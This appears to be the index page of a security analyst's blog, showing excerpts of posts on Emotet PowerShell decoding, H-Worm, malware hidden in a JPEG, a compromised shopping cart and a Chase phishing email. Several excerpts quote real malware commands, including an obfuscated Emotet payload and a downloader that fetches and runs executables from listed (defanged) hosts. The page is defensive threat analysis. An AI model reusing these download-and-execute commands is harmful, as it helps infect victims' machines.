Posts

June 2018, Emotet encoding observed and decoded

Nothing earth-shattering to report here; I just wanted to share the latest Emotet-encoded PowerShell command and one simple way to decode it to extract the Stage 2 download links. I know a lot of these obfuscated PowerShell commands can be easily decoded simply by using the Write-Host command; however, I do like to try different ways to reverse the obfuscation, as I think it just makes for a good analyst exercise. The PowerShell command is encoded as:

POwerSHell ieX("$(sV 'ofs' '' )" +[STrInG]( '15x77-81I95>124O96I92O11x22-11-69!78J92>6J68>73-65>78-72t95t11x89t74!69O79>68t70-16-15>92J64-89x122t114!11J22t11!69O78x92t6-68-73t65-78>72J95H11>120t82!88t95H78>70-5O101-78!95>5x124V78J73!104I71t66-78!69x95O16H15I97x88t94t74>66>11x22I11>12x67x95H95>91x17O4H4I79x68>89J68-95x67J82I76V66I71J88t95>89t74V91O5O72x68H70!4I71-100J111O70x4I107!67J95I95J91t17I4>4t92J92J92O5!70t82I91H67!74>70I70I68O72H67V74t5!72O68...

What is canonicalizer.ucsuri.tcs?

Recently I have observed a few hosts which were attempting to POST data to this domain, albeit unsuccessfully, as this is not a valid domain. Everything about the data in the PCAP suggests Microsoft SmartScreen, such as the user agent and even the decoded hex in the HTTP request header. For example:

252F680074007400700073003a002f002f00700069006e0067002e002e0063006800650063006b0061007000700065007800650063002e006d006900630072006f0073006f00660074002e0063006f006d002f00770069006e0064006f00770073002f007300680065006c006c002f0061006300740069006f006e007300

translates to

https://ping..checkappexec.microsoft.com/windows/shell/actions

Upon further investigation, I found that several hosts were attempting to query and unsuccessfully resolve this domain. So I did some digging, and the results for this ranged wildly: a patent for reputation-based software, patentimages.storage.googleapis.com/pdfs/US8695092.pdf; a suggestion that this is part of a Canon printer, https://translate.googl...

September 2017, Decoding the latest Emotet PowerShell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before: an email phish with a link, and the link downloads a malicious document. The document, usually a malicious Word document, uses VBA to build and execute a PowerShell command which then downloads the next stage of infection. This used to be very simple to see; for example, older observed variants produced the following PowerShell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...

Beware Compromised Shopping Carts

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and come across a website which just seems a bit off. Yesterday I received a Snort alert which I often see on a compromised host:

ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad

What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with the user's credit card and billing information in the request header. See screenshot: I've excluded the rest of the transcript so as not to mention the site, which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for building supplies. When looking at the website's checkout page, I stumbled upon the following code: Click to...

Decoding H-Worm

H-Worm, or Houdini Worm, is a VBScript which uses obfuscation techniques in an attempt to hide its code. I'm not here to reinvent the wheel; there are already good articles on H-Worm, including this FireEye article. I will, however, point out that with the right indicators in Snort, network traffic can be used to pin down a host which may be beaconing to a known URI structure for H-Worm, including the POST is-ready indicator. I had observed one host which had a VBS file in Startup named adobe_flash_player.vbs. Since this host had tripped my Snort signature, I decided to look at this as a file of interest. This particular file had a couple of layers of obfuscation. In this screen capture we see that the file appears to be a JPG file (although it doesn't actually display; it really appears to be garbage). This is an attempt to have an analyst potentially brush it off as a malformed JPG. However, if we scroll down to the end of the file, we see something interesting. ...

Example of obfuscated Malware hidden in JPEG

Last month I analyzed a weaponized Word document that came through e-mail. This is nothing special, I see these every day, but this one gave me something interesting to play with. The file https://www.virustotal.com/en/file/387ea7a4f82d7ba686ca8018684fd2fd803a9c05a4a47130845431d383d81b36/analysis/ launches the following VBS script: https://www.virustotal.com/en/file/fdf6b117b55302ecb7da95b68e9ca5e6882c12cbf41829dfb56688bb94595ea3/analysis/ The script performs HTTP traffic: GET http://ecovalduloir[.]com/fw[.]jpg (no longer available). When it was available, the file had an MD5 of bdd3cf6f227a368a5412f11a10831136, see https://www.virustotal.com/en/file/ce0e737d3eddbbb102867063f0b163d12358075691407542f9aecafa064538dc/analysis/ At first glance the JPEG looks OK; here is a screen capture of what the file image looks like. When we look at this file through a hex editor it becomes more interesting. Here is the beginning, which looks OK. Here is a snippet a...

Chase Alert E-Mail Phishing Scam

A couple of e-mails came into one of my inboxes today that I wanted to quickly share. These e-mails contained subject lines like "Chase Alert! [2568828843]" and an e-mail body which read as follows:

This e-mail has been sent to EMAILADDRESS@hotmail.com by JPMorgan Chase & Co. Online Banking Chase ALERT: Due to an unusual number of failed login attempts, your online banking access has been temporarily suspended. To restore your account access please click: Log On to Chase Online and proceed with the verification process. IMPORTANT NOTE: If we do not receive the appropriate account verification within 24 hours, you will need to visit a Chase branch to restore your account access. Sincerely, Chase Online(SM) © Copyright JPMorgan Chase & Co. 2016

The links in these e-mails have a URI structure similar to these:

hxxp://snacktast.info/99212afb7404efc9f6acd3f17238db46/index.php
hxxp://snacktast.info/b9cc2a03f094783974f35b51bf7464e4/index.php...